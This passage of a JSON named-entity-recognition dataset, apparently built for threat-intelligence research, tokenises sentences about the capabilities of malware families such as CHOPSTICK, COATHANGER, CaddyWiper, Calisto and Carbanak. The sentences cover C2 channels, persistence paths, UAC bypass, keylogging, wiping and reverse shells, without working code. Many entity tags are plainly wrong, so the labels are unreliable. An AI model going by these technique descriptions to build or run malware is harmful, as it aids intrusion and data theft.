"O", "O", "O" ] }, { "tokens": [ "CARROTBAT", "has", "the", "ability", "to", "delete", "downloaded", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CARROTBAT", "has", "the", "ability", "to", "download", "and", "execute", "a", "remote", "file", "via", "certutil." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "CARROTBAT", "has", "the", "ability", "to", "determine", "the", "operating", "system", "of", "the", "compromised", "host", "and", "whether", "Windows", "is", "being", "run", "with", "x86", "or", "x64", "architecture." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CARROTBAT", "has", "the", "ability", "to", "execute", "command", "line", "arguments", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CCBkdr", "was", "added", "to", "a", "legitimate,", "signed", "version", "5.33", "of", "the", "CCleaner", "software", "and", "distributed", "on", "CCleaner's", "distribution", "site." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CCBkdr", "can", "use", "a", "DGA", "for", "Fallback", "Channels", "if", "communications", "with", "the", "primary", "command", "and", "control", "server", "are", "lost." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CHOPSTICK", "encrypts", "C2", "communications", "with", "TLS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "CHOPSTICK", "is", "capable", "of", "performing", "remote", "command", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Part", "of", "APT28's", "operation", "involved", "using", "CHOPSTICK", "modules", "to", "copy", "itself", "to", "air-gapped", "machines,", "using", "files", "written", "to", "USB", "sticks", "to", "transfer", "data", "and", "command", "traffic." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "I-Purp", "O" ] }, { "tokens": [ "CHOPSTICK", "can", "use", "a", "DGA", "for", "Fallback", "Channels,", "domains", "are", "generated", "by", "concatenating", "words", "from", "lists." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CHOPSTICK", "can", "switch", "to", "a", "new", "C2", "channel", "if", "the", "current", "one", "is", "broken." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "older", "version", "of", "CHOPSTICK", "has", "a", "module", "that", "monitors", "all", "mounted", "volumes", "for", "files", "with", "the", "extensions", ".doc,", ".docx,", ".pgp,", ".gpg,", ".m2f,", "or", ".m2o." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "CHOPSTICK", "may", "store", "RC4", "encrypted", "configuration", "information", "in", "the", "Windows", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CHOPSTICK", "is", "capable", "of", "performing", "remote", "file", "transmission." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "CHOPSTICK", "used", "a", "proxy", "server", "between", "victims", "and", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CHOPSTICK", "is", "capable", "of", "performing", "keylogging." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Various", "implementations", "of", "CHOPSTICK", "communicate", "with", "C2", "over", "SMTP", "and", "POP3." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CHOPSTICK", "may", "modify", "Registry", "keys", "to", "store", "RC4", "encrypted", "configuration", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CHOPSTICK", "provides", "access", "to", "the", "Windows", "Registry,", "which", "can", "be", "used", "to", "gather", "information." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Part", "of", "APT28's", "operation", "involved", "using", "CHOPSTICK", "modules", "to", "copy", "itself", "to", "air-gapped", "machines", "and", "using", "files", "written", "to", "USB", "sticks", "to", "transfer", "data", "and", "command", "traffic." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "I-Purp", "O" ] }, { "tokens": [ "CHOPSTICK", "has", "the", "capability", "to", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "CHOPSTICK", "checks", "for", "antivirus", "and", "forensics", "software." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CHOPSTICK", "encrypts", "C2", "communications", "with", "RC4." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CHOPSTICK", "includes", "runtime", "checks", "to", "identify", "an", "analysis", "environment", "and", "prevent", "execution", "on", "it." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Various", "implementations", "of", "CHOPSTICK", "communicate", "with", "C2", "over", "HTTP." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "COATHANGER", "connects", "to", "command", "and", "control", "infrastructure", "using", "SSL." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "COATHANGER", "decodes", "configuration", "items", "from", "a", "bundled", "file", "for", "command", "and", "control", "activity." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "copies", "the", "malicious", "file", "<code>/data2/.bd.key/preload.so</code>", "to", "<code>/lib/preload.so</code>,", "then", "launches", "a", "child", "process", "that", "executes", "the", "malicious", "file", "<code>/data2/.bd.key/authd</code>", "as", "<code>/bin/authd</code>", "with", "the", "arguments", "<code>/lib/preload.so", "reboot", "newreboot", "1</code>.", "This", "injects", "the", "malicious", "preload.so", "file", "into", "the", "process", "with", "PID", "1,", "and", "replaces", "its", "reboot", "function", "with", "the", "malicious", "newreboot", "function", "for", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "is", "installed", "following", "exploitation", "of", "a", "vulnerable", "FortiGate", "device." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "removes", "files", "from", "victim", "environments", "following", "use", "in", "multiple", "instances." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "will", "survey", "the", "contents", "of", "system", "files", "during", "installation." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "creates", "and", "installs", "itself", "to", "a", "hidden", "installation", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "will", "remove", "and", "write", "malicious", "shared", "objects", "associated", "with", "legitimate", "system", "functions", "such", "as", "`read(2)`." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "will", "create", "a", "daemon", "for", "timed", "check-ins", "with", "command", "and", "control", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "will", "set", "the", "GID", "of", "`httpsd`", "to", "90", "when", "infected." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "uses", "ICMP", "for", "transmitting", "configuration", "information", "to", "and", "from", "its", "command", "and", "control", "server." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "can", "store", "obfuscated", "configuration", "information", "in", "the", "last", "56", "bytes", "of", "the", "file", "`/date/.bd.key/preload.so`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "COATHANGER", "will", "query", "running", "process", "information", "to", "determine", "subsequent", "program", "execution", "flow." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "includes", "a", "binary", "labeled", "`authd`", "that", "can", "inject", "a", "library", "into", "a", "running", "process", "and", "then", "hook", "an", "existing", "function", "within", "that", "process", "with", "a", "new", "function", "from", "that", "library." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "hooks", "or", "replaces", "multiple", "legitimate", "processes", "and", "other", "functions", "on", "victim", "devices." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "first", "stage", "of", "COATHANGER", "is", "delivered", "as", "a", "packed", "file." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "provides", "a", "BusyBox", "reverse", "shell", "for", "command", "and", "control." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "COATHANGER", "uses", "an", "HTTP", "GET", "request", "to", "initialize", "a", "follow-on", "TLS", "tunnel", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CORALDECK", "has", "created", "password-protected", "RAR,", "WinImage,", "and", "zip", "archives", "to", "be", "exfiltrated." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CORALDECK", "has", "exfiltrated", "data", "in", "HTTP", "POST", "headers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CORALDECK", "searches", "for", "specified", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "CORESHELL", "contains", "unused", "machine", "instructions", "in", "a", "likely", "attempt", "to", "hinder", "analysis." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CORESHELL", "downloads", "another", "dropper", "from", "its", "C2", "server." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "CORESHELL", "can", "communicate", "over", "SMTP", "and", "POP3", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "CORESHELL", "obfuscates", "strings", "using", "a", "custom", "stream", "cipher." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "CORESHELL", "has", "established", "persistence", "by", "creating", "autostart", "extensibility", "point", "(ASEP)", "Registry", "entries", "in", "the", "Run", "key", "and", "other", "Registry", "keys,", "as", "well", "as", "by", "creating", "shortcuts", "in", "the", "Internet", "Explorer", "Quick", "Start", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CORESHELL", "is", "installed", "via", "execution", "of", "rundll32", "with", "an", "export", "named", "\"init\"", "or", "\"InitW.\"" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "CORESHELL", "C2", "messages", "are", "Base64-encoded." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "CORESHELL", "C2", "messages", "are", "encrypted", "with", "custom", "stream", "ciphers", "using", "six-byte", "or", "eight-byte", "keys." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "CORESHELL", "collects", "hostname,", "volume", "serial", "number", "and", "OS", "version", "data", "from", "the", "victim", "and", "sends", "the", "information", "to", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CORESHELL", "can", "communicate", "over", "HTTP", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "can", "bypass", "UAC", "using", "the", "SilentCleanup", "task", "to", "execute", "the", "binary", "with", "elevated", "privileges." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "B-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "has", "come", "signed", "with", "revoked", "certificates." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "has", "the", "ability", "to", "self", "delete." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "has", "the", "ability", "to", "remove", "values", "it", "writes", "to", "the", "Registry." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "can", "download", "additional", "tools", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "has", "been", "delivered", "via", "malicious", "documents", "with", "embedded", "macros." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "has", "attempted", "to", "appear", "as", "a", "legitimate", "Windows", "service", "with", "a", "fake", "description", "claiming", "it", "is", "used", "to", "support", "packed", "applications." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "CSPY", "Downloader", "can", "write", "to", "the", "Registry", "under", "the", "<code>%windir%</code>", "variable", "to", "execute", "tasks." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "can", "use", "the", "schtasks", "utility", "to", "bypass", "UAC." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "has", "been", "packed", "with", "UPX." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "CSPY", "Downloader", "can", "search", "loaded", "modules,", "PEB", "structure,", "file", "paths,", "Registry", "keys,", "and", "memory", "to", "determine", "if", "it", "is", "being", "debugged", "or", "running", "in", "a", "virtual", "environment." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "B-Way", "B-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CSPY", "Downloader", "can", "use", "GET", "requests", "to", "download", "additional", "payloads", "from", "C2." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "B-Features", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "Cachedump", "can", "extract", "cached", "password", "hashes", "from", "cache", "entry", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CaddyWiper", "can", "work", "alphabetically", "through", "drives", "on", "a", "compromised", "system", "to", "take", "ownership", "of", "and", "overwrite", "all", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "CaddyWiper", "has", "the", "ability", "to", "destroy", "information", "about", "a", "physical", "drive's", "partitions", "including", "the", "MBR,", "GPT,", "and", "partition", "entries." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "CaddyWiper", "can", "enumerate", "all", "files", "and", "directories", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CaddyWiper", "has", "the", "ability", "to", "dynamically", "resolve", "and", "use", "APIs,", "including", "`SeTakeOwnershipPrivilege`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "CaddyWiper", "can", "obtain", "a", "list", "of", "current", "processes." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CaddyWiper", "can", "use", "`DsRoleGetPrimaryDomainInformation`", "to", "determine", "the", "role", "of", "the", "infected", "machine.", "CaddyWiper", "can", "also", "halt", "execution", "if", "the", "compromised", "host", "is", "identified", "as", "a", "domain", "controller." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CaddyWiper", "can", "modify", "ACL", "entries", "to", "take", "ownership", "of", "files." ], "ner_tags": [ "B-Idus", "O", "I-Features", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Cadelspy", "has", "the", "ability", "to", "identify", "open", "windows", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cadelspy", "has", "the", "ability", "to", "compress", "stolen", "data", "into", "a", ".cab", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Cadelspy", "has", "the", "ability", "to", "record", "audio", "from", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cadelspy", "has", "the", "ability", "to", "steal", "data", "from", "the", "clipboard." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Cadelspy", "has", "the", "ability", "to", "log", "keystrokes", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Cadelspy", "has", "the", "ability", "to", "steal", "information", "about", "printers", "and", "the", "documents", "sent", "to", "printers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cadelspy", "has", "the", "ability", "to", "capture", "screenshots", "and", "webcam", "photos." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "B-Features", "O" ] }, { "tokens": [ "Cadelspy", "has", "the", "ability", "to", "discover", "information", "about", "the", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "adds", "permissions", "and", "remote", "logins", "to", "all", "users." ], "ner_tags": [ "B-SamFile", "I-Features", "B-HackOrg", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "uses", "the", "<code>zip", "-r</code>", "command", "to", "compress", "the", "data", "collected", "on", "the", "local", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "collects", "information", "on", "bookmarks", "from", "Google", "Chrome." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "can", "collect", "data", "from", "user", "directories." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Calisto", "has", "the", "capability", "to", "use", "<code>rm", "-rf</code>", "to", "remove", "folders", "and", "files", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "I-Features", "B-HackOrg", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "presents", "an", "input", "prompt", "asking", "for", "the", "user's", "login", "and", "password." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "uses", "a", "hidden", "directory", "named", ".calisto", "to", "store", "data", "from", "the", "victim’s", "machine", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "has", "the", "capability", "to", "upload", "and", "download", "files", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "collects", "Keychain", "storage", "data", "and", "copies", "those", "passwords/tokens", "to", "a", "file." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "adds", "a", ".plist", "file", "to", "the", "/Library/LaunchAgents", "folder", "to", "maintain", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "uses", "launchctl", "to", "enable", "screen", "sharing", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "has", "the", "capability", "to", "add", "its", "own", "account", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "uses", "a", "hidden", "directory", "named", ".calisto", "to", "store", "data", "from", "the", "victim’s", "machine", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto's", "installation", "file", "is", "an", "unsigned", "DMG", "image", "under", "the", "guise", "of", "Intego’s", "security", "solution", "for", "mac." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Calisto", "runs", "the", "<code>ifconfig</code>", "command", "to", "obtain", "the", "IP", "address", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CallMe", "exfiltrates", "data", "to", "its", "C2", "server", "over", "the", "same", "protocol", "as", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CallMe", "has", "the", "capability", "to", "download", "a", "file", "to", "the", "victim", "from", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "CallMe", "uses", "AES", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "CallMe", "has", "the", "capability", "to", "create", "a", "reverse", "shell", "on", "victims." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cannon", "exfiltrates", "collected", "data", "over", "email", "via", "SMTP/S", "and", "POP3/S", "C2", "channels." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Cannon", "can", "obtain", "victim", "drive", "information", "as", "well", "as", "a", "list", "of", "folders", "in", "C:\\Program", "Files." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cannon", "can", "download", "a", "payload", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cannon", "uses", "SMTP/S", "and", "POP3/S", "for", "C2", "communications", "by", "sending", "and", "receiving", "emails." ], "ner_tags": [ "B-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way" ] }, { "tokens": [ "Cannon", "can", "obtain", "a", "list", "of", "processes", "running", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cannon", "can", "take", "a", "screenshot", "of", "the", "desktop." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Cannon", "can", "gather", "system", "information", "from", "the", "victim’s", "machine", "such", "as", "the", "OS", "version,", "machine", "name,", "and", "drive", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cannon", "can", "gather", "the", "username", "from", "the", "system." ], "ner_tags": [ "B-Tool", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Cannon", "can", "collect", "the", "current", "time", "zone", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cannon", "adds", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon</code>", "to", "establish", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "exfiltrates", "data", "in", "compressed", "chunks", "if", "a", "message", "is", "larger", "than", "4096", "bytes", "." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "has", "a", "command", "to", "delete", "files." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "logs", "key", "strokes", "for", "configured", "processes", "and", "sends", "them", "back", "to", "the", "C2", "server." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Carbanak", "can", "create", "a", "Windows", "account." ], "ner_tags": [ "B-Features", "O", "I-Features", 